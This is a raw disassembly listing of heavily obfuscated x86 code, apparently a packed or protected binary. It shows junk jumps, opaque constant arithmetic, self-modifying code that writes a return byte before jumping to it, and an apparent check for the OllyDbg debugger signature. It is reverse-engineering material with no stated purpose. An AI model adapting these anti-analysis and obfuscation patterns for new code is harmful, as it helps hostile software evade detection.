dword_4470AC	dd 77F50000h		; DATA XREF: sub_43C2D9:loc_45806Dw
					; sub_44438E:loc_45948Br
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449734

loc_4470B0:				; CODE XREF: sub_449734+126BEj
		jmp	loc_4422F9
; END OF FUNCTION CHUNK	FOR sub_449734
; ---------------------------------------------------------------------------
		db 19h,	0A7h, 0Ch
dword_4470B8	dd 0			; DATA XREF: sub_43BA66+Ar
					; sub_43D7C7+2w ...
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44EE3D

loc_4470BC:				; CODE XREF: sub_44EE3D-10C13j
		jmp	loc_43BFD1
; END OF FUNCTION CHUNK	FOR sub_44EE3D
; ---------------------------------------------------------------------------
		db 7Ah,	17h, 0FCh
dword_4470C4	dd 77E79F93h		; DATA XREF: sub_43BA66+1D6Er
					; sub_43BA66:loc_43F483r ...
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4507BF

loc_4470C8:				; CODE XREF: sub_4507BF-EBF0j
		jmp	loc_44B682
; END OF FUNCTION CHUNK	FOR sub_4507BF
; ---------------------------------------------------------------------------
		db 7Ch,	78h, 45h
dword_4470D0	dd 0			; DATA XREF: sub_4502C2-B45r
					; sub_45623A-387r ...
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AC77

loc_4470D4:				; CODE XREF: sub_44AC77:loc_44AC84j
		jmp	loc_448E96
; END OF FUNCTION CHUNK	FOR sub_44AC77
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C7B9

loc_4470D9:				; CODE XREF: sub_43C7B9+4279j
		jmp	loc_44C160
; END OF FUNCTION CHUNK	FOR sub_43C7B9
; ---------------------------------------------------------------------------
		dw 5094h
dword_4470E0	dd 77E805D8h		; DATA XREF: sub_44977F:loc_44296Aw
					; sub_44E4A5:loc_44296Fr ...
dword_4470E4	dd 7E71B147h		; DATA XREF: sub_43DE8B+19D95r
		dd 38DCCBBFh
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457B90

loc_4470EC:				; CODE XREF: sub_457B90+337Fj
		jmp	nullsub_504
; END OF FUNCTION CHUNK	FOR sub_457B90
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4562E5

loc_4470F1:				; CODE XREF: sub_4562E5:loc_442CF7j
		push	2466D91Eh
		pop	esi
		or	esi, 0FF5EDC36h
		cmp	esi, 6077370Ch
		jmp	loc_43D99A
; END OF FUNCTION CHUNK	FOR sub_4562E5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448526

loc_447108:				; CODE XREF: sub_448526:loc_446CA6j
		mov	edx, eax
		jmp	sub_43FC38
; END OF FUNCTION CHUNK	FOR sub_448526
; ---------------------------------------------------------------------------

loc_44710F:				; CODE XREF: y2kk37jd:004431CDj
		push	0A9C72EACh
		pop	edx
		rol	edx, 9
		jmp	loc_44A619
; ---------------------------------------------------------------------------

loc_44711D:				; CODE XREF: y2kk37jd:loc_44AD3Aj
		push	edi
		call	sub_459695
; START	OF FUNCTION CHUNK FOR sub_449DFE

loc_447123:				; CODE XREF: sub_449DFE:loc_45A8BDj
		xor	edi, 11E31085h
		or	edi, 99448F3Fh
		xor	edi, 0EE629C7Fh
		cmp	edi, 0D431731h
		jmp	loc_446BBF
; END OF FUNCTION CHUNK	FOR sub_449DFE
; ---------------------------------------------------------------------------

loc_447140:				; CODE XREF: y2kk37jd:004405B1j
		push	esi
		mov	esi, eax
		xchg	esi, [esp]
		push	ebx
		jmp	loc_44ED21

; =============== S U B	R O U T	I N E =======================================



sub_44714C	proc near		; CODE XREF: sub_44B117-114Cp
					; sub_453867+300j ...

arg_0		= dword	ptr  4

		xchg	esi, [esp+0]
		pop	esi
		add	edx, 0D937BE62h
		xchg	edx, [esp-4+arg_0]
		jmp	sub_4526B7
sub_44714C	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445A2D

loc_44715E:				; CODE XREF: sub_445A2D:loc_43FAE6j
		xchg	esi, [esp+4+var_4]
		jmp	loc_447353
; END OF FUNCTION CHUNK	FOR sub_445A2D

; =============== S U B	R O U T	I N E =======================================



sub_447166	proc near		; CODE XREF: y2kk37jd:0044F17Ej
					; y2kk37jd:0045123Fp

; FUNCTION CHUNK AT 00454589 SIZE 00000005 BYTES

		xchg	eax, [esp+0]
		pop	eax
		mov	ebp, esp
		push	offset loc_457C12
		jmp	loc_454589
sub_447166	endp

; ---------------------------------------------------------------------------

loc_447176:				; CODE XREF: y2kk37jd:0044AB32j
		pop	ecx
		mov	ecx, 88525CD1h
		jmp	loc_4483D9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E679

loc_447181:				; CODE XREF: sub_43E679+16998j
		jz	loc_44170B
		jmp	loc_448C20
; END OF FUNCTION CHUNK	FOR sub_43E679
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_459789

loc_44718C:				; CODE XREF: sub_459789-5107j
		not	ecx
		shl	eax, 1Ch
		pop	ecx
		cdq
		jmp	loc_43D933
; END OF FUNCTION CHUNK	FOR sub_459789
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_136. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455E0B

loc_447199:				; CODE XREF: y2kk37jd:004531E1j
					; sub_455E0B+13j
		jmp	loc_44116E
; END OF FUNCTION CHUNK	FOR sub_455E0B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4492F7

loc_44719E:				; CODE XREF: sub_4492F7+402Aj
		jmp	loc_456F93
; END OF FUNCTION CHUNK	FOR sub_4492F7
; ---------------------------------------------------------------------------
		push	offset sub_44F309
		jmp	loc_45269B

; =============== S U B	R O U T	I N E =======================================



sub_4471AD	proc near		; CODE XREF: sub_4448E2+D8F4j
		push	ebp
sub_4471AD	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_4448E2

loc_4471AE:				; CODE XREF: sub_4448E2:loc_440143j
		lea	eax, [ebp+var_26F]
		push	offset loc_452E15
		jmp	loc_455F17
; END OF FUNCTION CHUNK	FOR sub_4448E2
; ---------------------------------------------------------------------------

loc_4471BE:				; CODE XREF: y2kk37jd:loc_44B503j
		pop	edx
		sub	edx, 94393494h
		xor	edx, ds:4000F2h
		add	edx, 5EDBD295h
		mov	[edx], eax
		pop	edx
		lea	eax, sub_4597AE
		mov	byte ptr [eax],	0C3h
		jmp	sub_4597AE
; ---------------------------------------------------------------------------
		or	eax, edi
		xor	eax, 87851BDh
		jmp	sub_44C57A
; ---------------------------------------------------------------------------
		xchg	ebx, [ecx]
		jmp	sub_44CF09
; ---------------------------------------------------------------------------

loc_4471F6:				; CODE XREF: y2kk37jd:loc_43F0E4j
		jz	loc_45B349

loc_4471FC:				; CODE XREF: y2kk37jd:0045C1D1j
		jmp	loc_457570
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AC89

loc_447201:				; CODE XREF: sub_44AC89-4EDDj
		push	esi
		cmp	eax, ecx
; END OF FUNCTION CHUNK	FOR sub_44AC89
; START	OF FUNCTION CHUNK FOR sub_43F770

loc_447204:				; CODE XREF: sub_43F770:loc_444432j
		jmp	loc_44A474
; END OF FUNCTION CHUNK	FOR sub_43F770
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440337

loc_447209:				; CODE XREF: sub_440337-767j
		xchg	ebx, [edi]
		ror	ebx, 3

loc_44720E:				; CODE XREF: sub_440337:loc_44E441j
		push	eax
		lea	eax, dword_441120
		push	ebp
		mov	ebp, eax
		call	sub_452A28

loc_44721D:				; CODE XREF: y2kk37jd:0044BA33j
		jmp	loc_4555CE
; END OF FUNCTION CHUNK	FOR sub_440337
; ---------------------------------------------------------------------------

loc_447222:				; CODE XREF: y2kk37jd:loc_4421B8j
		jz	loc_459D94
		jmp	loc_44061B
; ---------------------------------------------------------------------------

loc_44722D:				; CODE XREF: y2kk37jd:00458132j
		shr	ecx, 9
		push	0CD8CC6BBh
		jmp	loc_43CE94

; =============== S U B	R O U T	I N E =======================================



sub_44723A	proc near		; CODE XREF: sub_447977:loc_446DCBp
					; y2kk37jd:00458034j

; FUNCTION CHUNK AT 00444C8B SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044D2CD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004599C4 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0045ADCA SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0045B322 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0045B5D2 SIZE 0000000B BYTES

		xchg	eax, [esp+0]
		pop	eax
		push	esi
		mov	esi, ebp
		xchg	esi, [esp+0]
		mov	ebp, esp
		add	esp, 0FFFFFFECh
		jmp	loc_45ADCA
sub_44723A	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_44724E:				; CODE XREF: y2kk37jd:loc_43E495j
		sub	edi, 73D7B902h
		test	edi, 8
		jmp	loc_457CF0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B8D6

loc_44725F:				; CODE XREF: sub_43B8D6:loc_43B59Fj
		jnz	loc_45B750

loc_447265:				; CODE XREF: sub_4440AB+1397Cj
		jmp	loc_455FA0
; END OF FUNCTION CHUNK	FOR sub_43B8D6
; ---------------------------------------------------------------------------
		and	ebp, eax
		test	eax, 510C448Ch
		jmp	loc_45B297
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454413

loc_447277:				; CODE XREF: sub_454413-11353j
		sub	ecx, ebp
		sub	edi, ecx
		jmp	loc_441A96
; END OF FUNCTION CHUNK	FOR sub_454413
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4507BF

loc_447280:				; CODE XREF: sub_4507BF:loc_4533BEj
					; sub_4507BF+B764j
		cmp	dword ptr [ebp-108h], 43776569h
		jnz	loc_447BCD
		jmp	loc_45525D
; END OF FUNCTION CHUNK	FOR sub_4507BF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F911

loc_447295:				; CODE XREF: sub_43F911+D2EBj
		test	eax, 2
		jmp	loc_43DB5C
; END OF FUNCTION CHUNK	FOR sub_43F911
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458DD9

loc_4472A0:				; CODE XREF: sub_458DD9:loc_43D05Bj
					; y2kk37jd:0043D076j
		or	ebx, 0D15BC936h
		xor	ebx, 0BDEA3316h
		xor	eax, ebx
		pop	ebx
		ror	eax, 3
		mov	edx, [esp-4+arg_0]
		jmp	loc_44DE21
; END OF FUNCTION CHUNK	FOR sub_458DD9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44001E

loc_4472BA:				; CODE XREF: sub_44001E:loc_44A4FAj
		cmp	dword ptr [ebp-4], 0
		jnz	loc_445FDB
		jmp	loc_448AE7
; END OF FUNCTION CHUNK	FOR sub_44001E
; ---------------------------------------------------------------------------

loc_4472C9:				; DATA XREF: sub_4436E7+75D0o
		add	ebx, ebp
		add	ebx, 38E7998Ch
		mov	[ebx], eax
		pop	ebx
		mov	eax, offset dword_450BB4
		call	sub_443688
		cmp	ds:dword_450BC8, 0
		jmp	loc_4523BE
; ---------------------------------------------------------------------------

loc_4472EA:				; DATA XREF: sub_4448E2:loc_4511CFo
		js	loc_4433C6
		cmp	dword ptr [ebp-4], 7
		jnz	loc_458D82
		jmp	loc_4576D4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44966C

loc_4472FF:				; CODE XREF: sub_44966C:loc_445FE5j
		jge	loc_43D95E
		push	esi
		and	eax, 0C032CD90h
		jnb	loc_43F5B3
		xor	ebx, 0D70918C8h
		cmp	ebx, 559F9CB4h
		jmp	loc_43D958
; END OF FUNCTION CHUNK	FOR sub_44966C
; ---------------------------------------------------------------------------
		db 0FDh
dword_447324	dd 9A77E616h		; DATA XREF: y2kk37jd:0043C983w
					; sub_4435B9+9r ...
dword_447328	dd 9977E7Ah		; DATA XREF: sub_442938-259Ar
; ---------------------------------------------------------------------------

loc_44732C:				; CODE XREF: y2kk37jd:0045A834j
		jmp	loc_45A97A
; ---------------------------------------------------------------------------
		db 0BCh, 0C2h, 88h
dword_447334	dd 59BDDF9Ch		; DATA XREF: sub_43C851+A39Cr
dword_447338	dd 0E736A377h		; DATA XREF: y2kk37jd:0043D502r
					; sub_440337+14770w
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4514DE

loc_44733C:				; CODE XREF: sub_4514DE+5972j
		jmp	sub_45ADEC
; END OF FUNCTION CHUNK	FOR sub_4514DE
; ---------------------------------------------------------------------------
		db 85h,	41h, 3Eh
dword_447344	dd 0E088EFCFh		; DATA XREF: y2kk37jd:00450652w
					; sub_43BDF4+1530Er
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CDD5

loc_447348:				; CODE XREF: sub_44CDD5+2675j
		jmp	loc_43BFBC
; END OF FUNCTION CHUNK	FOR sub_44CDD5
; ---------------------------------------------------------------------------

locret_44734D:				; CODE XREF: y2kk37jd:0044364Dj
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F346

loc_44734E:				; CODE XREF: sub_43F346+1BE9Dj
		jmp	loc_43F0D9
; END OF FUNCTION CHUNK	FOR sub_43F346
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445A2D

loc_447353:				; CODE XREF: sub_445A2D+1734j
		jmp	sub_440CD1
; END OF FUNCTION CHUNK	FOR sub_445A2D
; ---------------------------------------------------------------------------

loc_447358:				; CODE XREF: y2kk37jd:00446B07j
		jmp	loc_440DB0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B4F9

loc_44735D:				; CODE XREF: sub_43B4F9+2029Bj
		push	offset sub_455531
		jmp	loc_45B3DD
; END OF FUNCTION CHUNK	FOR sub_43B4F9
; ---------------------------------------------------------------------------

loc_447367:				; CODE XREF: y2kk37jd:0043E153j
		ror	ecx, 1Eh
; START	OF FUNCTION CHUNK FOR sub_4585C4

loc_44736A:				; CODE XREF: sub_4585C4-DAF6j
		and	eax, 555FF807h
		xor	eax, 0EFFAB8D3h
		add	eax, 405F5D57h
		xchg	eax, [esp+0]
		jmp	sub_4581BB
; END OF FUNCTION CHUNK	FOR sub_4585C4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B0D0

loc_447384:				; CODE XREF: sub_44B0D0-F5FCj
		jz	loc_44F2EC
		jmp	loc_440C38
; END OF FUNCTION CHUNK	FOR sub_44B0D0
; ---------------------------------------------------------------------------

loc_44738F:				; CODE XREF: y2kk37jd:loc_454B60j
		jnz	loc_45581D
		test	ecx, ebx
		jmp	loc_43E91B
; ---------------------------------------------------------------------------

locret_44739C:				; CODE XREF: y2kk37jd:00455341j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442DDC

loc_44739D:				; CODE XREF: sub_442DDC+1399j
		not	ebx

loc_44739F:				; CODE XREF: sub_442DDC:loc_444163j
		add	edi, 37D8ACEFh
		xor	edi, ds:4000E8h
		add	edi, 0CE780A8Eh
		jmp	loc_455238
; END OF FUNCTION CHUNK	FOR sub_442DDC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F75D

loc_4473B6:				; CODE XREF: sub_43F75D+Cj
		add	eax, 0DF662B17h
		cmp	dword ptr [eax], 4742444Fh
		jz	loc_44D915
		jmp	loc_441AC2
; END OF FUNCTION CHUNK	FOR sub_43F75D

; =============== S U B	R O U T	I N E =======================================



sub_4473CD	proc near		; DATA XREF: y2kk37jd:loc_44E943o

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 00447B0F SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0045A152 SIZE 00000006 BYTES

		push	edi
		push	0A372086Dh
		pop	edi
		xor	edi, 0D9AEED59h
		jmp	loc_45A152
sub_4473CD	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_4473DF:				; DATA XREF: sub_44A33C:loc_43C787o
		push	edx
		push	8105F496h
		pop	edx
		or	edx, 0F5421485h
		and	edx, 756C83DAh
		rol	edx, 0Bh
		jmp	loc_43F88C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F3F5

loc_4473FA:				; CODE XREF: sub_44F3F5+1D7Cj
		adc	edx, eax
		jns	nullsub_258
; END OF FUNCTION CHUNK	FOR sub_44F3F5
; START	OF FUNCTION CHUNK FOR sub_43C851

loc_447402:				; CODE XREF: sub_43C851+FEBj
		jmp	loc_452323
; END OF FUNCTION CHUNK	FOR sub_43C851

; =============== S U B	R O U T	I N E =======================================



sub_447407	proc near		; CODE XREF: sub_445226:loc_44D50Ep
					; y2kk37jd:0045046Aj

var_8		= dword	ptr -8

; FUNCTION CHUNK AT 0043B0E2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00440738 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00440EA2 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 004489FE SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00450BB8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00453594 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004536AA SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004579C5 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0045A7E6 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0045ACEB SIZE 00000008 BYTES

		xchg	edx, [esp+0]
		pop	edx
		push	eax
		mov	edx, eax
		call	sub_4581BB
		jmp	loc_43B0E2
sub_447407	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456809

loc_447418:				; CODE XREF: sub_456809-80Bj
		test	ecx, 0F6EC3293h
		jmp	loc_43D154
; END OF FUNCTION CHUNK	FOR sub_456809

; =============== S U B	R O U T	I N E =======================================



sub_447423	proc near		; DATA XREF: sub_4477A2+1B2Fo

var_8		= dword	ptr -8

; FUNCTION CHUNK AT 00442684 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00445AF2 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0044C5A9 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 004518DC SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0045B464 SIZE 0000000B BYTES

		pushf
		push	0E2165009h
		pop	eax
		and	eax, 68BCAAA6h

loc_447430:				; CODE XREF: y2kk37jd:0044CCAAj
		xor	eax, 45C3EFDFh
		sub	eax, 128EEC9Ch
		cmp	eax, 0DD0A8D95h
		jmp	loc_45B464
sub_447423	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_447447:				; CODE XREF: y2kk37jd:0043B730j
		and	ecx, 28974B6h
		add	ecx, 8104FCDh
; START	OF FUNCTION CHUNK FOR sub_45B7AA

loc_447453:				; CODE XREF: sub_45B7AA:loc_4551C0j
		sub	ecx, 1593D601h
		or	ecx, 479C03C5h
		test	ecx, 80h
		jmp	loc_45730F
; END OF FUNCTION CHUNK	FOR sub_45B7AA
; ---------------------------------------------------------------------------
		mov	ebp, [edi]
		ror	ecx, 1Fh
		jmp	sub_451565
; ---------------------------------------------------------------------------
		or	eax, eax
		jnz	loc_440B03
		jmp	loc_457A5F
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_281. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4593F8

loc_447482:				; CODE XREF: sub_4593F8-5D96j
		jmp	loc_44053C
; END OF FUNCTION CHUNK	FOR sub_4593F8
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_195. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_447488:				; CODE XREF: y2kk37jd:004485B3j
		jmp	loc_457974
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444BB7

loc_44748D:				; CODE XREF: sub_444BB7+10j
		jmp	loc_4540D0
; END OF FUNCTION CHUNK	FOR sub_444BB7
; ---------------------------------------------------------------------------

loc_447492:				; CODE XREF: y2kk37jd:00442AA5j
		jmp	loc_445A09
; ---------------------------------------------------------------------------

loc_447497:				; CODE XREF: y2kk37jd:0044BCAAj
		pop	eax
		sub	eax, 0CE07C0B1h
		xor	eax, 0BE9C4235h
		call	sub_4407FF

; =============== S U B	R O U T	I N E =======================================



sub_4474A9	proc near		; CODE XREF: y2kk37jd:0044429Ep
					; y2kk37jd:00458795j

; FUNCTION CHUNK AT 00440AD3 SIZE 00000006 BYTES

		xchg	edi, [esp+0]
		pop	edi
		xor	esi, 0F5B9271Eh
		xor	ebx, esi
		pop	esi
		adc	ecx, eax
		cmp	ebx, 99FEE0A1h
		sub	ecx, edx
		jmp	loc_440AD3
sub_4474A9	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_4474C5	proc near		; CODE XREF: sub_446303:loc_43CAD3p
					; y2kk37jd:00442BFFj

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 00451510 SIZE 00000005 BYTES

		xchg	edx, [esp+0]
		pop	edx
		add	ecx, 0E1713DBCh
		xchg	ecx, [esp-4+arg_0]

loc_4474D2:				; CODE XREF: sub_43EF4F:loc_451EC9j
		jmp	loc_451510
sub_4474C5	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456A36

loc_4474D7:				; CODE XREF: sub_456A36:loc_45AA41j
		jnz	loc_44D9E3
		jmp	loc_44BD39
; END OF FUNCTION CHUNK	FOR sub_456A36

; =============== S U B	R O U T	I N E =======================================



sub_4474E2	proc near		; DATA XREF: y2kk37jd:00459279o
		pop	eax
		push	offset loc_44560B
		jmp	nullsub_506
sub_4474E2	endp

; ---------------------------------------------------------------------------

loc_4474ED:				; CODE XREF: y2kk37jd:0044A7F0j
		jo	loc_458303
		sub	edx, 4125976Eh
		mov	ebp, ebx
		jmp	loc_45204F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4447EA

loc_447500:				; CODE XREF: sub_4447EA+F884j
		jz	loc_4463DB
		jmp	loc_4421BD
; END OF FUNCTION CHUNK	FOR sub_4447EA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4411C3

loc_44750B:				; CODE XREF: sub_4411C3+1682Bj
		jz	loc_4422C8
		jmp	loc_43B5D0
; END OF FUNCTION CHUNK	FOR sub_4411C3

; =============== S U B	R O U T	I N E =======================================



sub_447516	proc near		; DATA XREF: sub_43ED86+12DE6o
		call	sub_442C3E
sub_447516	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_443AA7

loc_44751B:				; CODE XREF: sub_443AA7:loc_440F77j
		rol	eax, 3
		xor	eax, 42B5FE69h
		add	eax, 6DC3A957h
		rol	eax, 14h
		add	eax, 8879597Bh

loc_447533:				; CODE XREF: sub_43ED86:loc_4555A8j
		mov	ds:dword_455490, eax
		jmp	loc_44FB97
; END OF FUNCTION CHUNK	FOR sub_443AA7

; =============== S U B	R O U T	I N E =======================================



sub_44753E	proc near		; CODE XREF: y2kk37jd:0045032Fj
					; sub_454817+8p

var_8		= dword	ptr -8

; FUNCTION CHUNK AT 0043BC1D SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0043C38B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043CBC3 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0043D09B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043EDC6 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 004403E3 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 00443E26 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00445860 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004461B5 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00449F25 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0044CAD4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044DB11 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00453DC9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004542AF SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0045498C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455B5B SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00457D84 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045BD54 SIZE 0000000B BYTES

		xchg	edi, [esp+8+var_8]
		pop	edi
		add	esi, 6CCC908Bh
		mov	esi, [esi]
		cmp	eax, esi
		pop	esi
		jmp	loc_43C38B
sub_44753E	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BD0D

loc_447552:				; CODE XREF: sub_43BD0D+1B64j
					; y2kk37jd:004527AFj
		sub	eax, 55C9BAA2h
		or	eax, 6D463A68h
		jnz	loc_44A561

loc_447564:				; CODE XREF: sub_455C2D-466Fj
		jmp	loc_43FD56
; END OF FUNCTION CHUNK	FOR sub_43BD0D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4526A0

loc_447569:				; CODE XREF: sub_4526A0-10914j
		jmp	sub_4526A0
; END OF FUNCTION CHUNK	FOR sub_4526A0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4418BA

loc_44756E:				; CODE XREF: sub_4418BA+Fj
		jmp	loc_443D3C
; END OF FUNCTION CHUNK	FOR sub_4418BA
; ---------------------------------------------------------------------------
		jnz	loc_453880
		jge	sub_4493D7
		jmp	loc_44A558
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_459789

loc_447584:				; CODE XREF: sub_459789+Cj
		push	edi
		push	4663FDF2h
		pop	edi
		xor	edi, 4C17BF07h
		call	sub_45494E

loc_447596:				; CODE XREF: y2kk37jd:loc_4564BEj
		pop	edx
		xor	edx, 2652D7EFh
		or	edx, 45E0A2B6h
		cmp	edx, 0DA87284Ah
		jmp	loc_45AEE0
; END OF FUNCTION CHUNK	FOR sub_459789
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454E20

loc_4475AE:				; CODE XREF: sub_454E20-14815j
		rol	esi, 1
		jmp	loc_440116
; END OF FUNCTION CHUNK	FOR sub_454E20
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BD0D

loc_4475B5:				; CODE XREF: sub_43BD0D+11D16j
		jnz	loc_44B41B
		cdq
		pushf
		test	eax, edx
		jmp	loc_44B40F
; END OF FUNCTION CHUNK	FOR sub_43BD0D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4514DE

loc_4475C4:				; CODE XREF: sub_4514DE:loc_443F3Fj
		cmp	dword ptr [ebp-4], 1
		jnz	loc_43C597
		jmp	loc_452E53
; END OF FUNCTION CHUNK	FOR sub_4514DE
; ---------------------------------------------------------------------------

loc_4475D3:				; CODE XREF: y2kk37jd:0045B8A3j
		xchg	ebx, edi
		sbb	edi, eax
		xchg	eax, edi
		test	eax, 0C75B8054h
		jmp	loc_4427D5
; ---------------------------------------------------------------------------

loc_4475E4:				; CODE XREF: y2kk37jd:004539B4j
		add	ecx, 0B488039h
		mov	[ecx], eax
		pop	ecx
		lea	eax, loc_452281
		mov	byte ptr [eax],	0C3h
		jmp	loc_452281
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B41E

loc_4475FB:				; CODE XREF: sub_45B41E:loc_452281j
		pop	edx
		mov	eax, [esp+0]
		jmp	loc_45B642
; END OF FUNCTION CHUNK	FOR sub_45B41E
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_190. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446E19

loc_447605:				; CODE XREF: sub_446E19+13j
		pop	esi
		sub	esi, 0CA447904h
		rol	esi, 0Bh
		xor	esi, 7DE2329Bh
		add	esi, ebp
		add	esi, 5267DE9Ah
		jmp	loc_441A0D
; END OF FUNCTION CHUNK	FOR sub_446E19
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D3D0

loc_447622:				; CODE XREF: sub_44D3D0:loc_447E89j
		mov	edi, ebx
		xchg	edi, [esp+0Ch+var_C]
		push	edx
		push	648D73F1h
		xchg	eax, [esp+14h+var_14]
		mov	edx, eax
		jmp	loc_43D847
; END OF FUNCTION CHUNK	FOR sub_44D3D0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B2EB

loc_447637:				; CODE XREF: sub_43B2EB+3481j
		call	sub_44F142

loc_44763C:				; CODE XREF: sub_4518C3-8A2j
		jmp	loc_45C6FB
; END OF FUNCTION CHUNK	FOR sub_43B2EB
; ---------------------------------------------------------------------------

loc_447641:				; CODE XREF: y2kk37jd:00440872j
		not	ecx
		test	eax, 3D6F792Eh
		jmp	loc_44CF56
; ---------------------------------------------------------------------------

loc_44764E:				; CODE XREF: y2kk37jd:00453291j
		jz	loc_43C9D7
		jmp	loc_4562A2

; =============== S U B	R O U T	I N E =======================================



sub_447659	proc near		; CODE XREF: y2kk37jd:0043C84Cj
					; sub_453778+1EF5p

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 004451ED SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004525B4 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 004572CE SIZE 00000008 BYTES

		xchg	esi, [esp+0]
		pop	esi
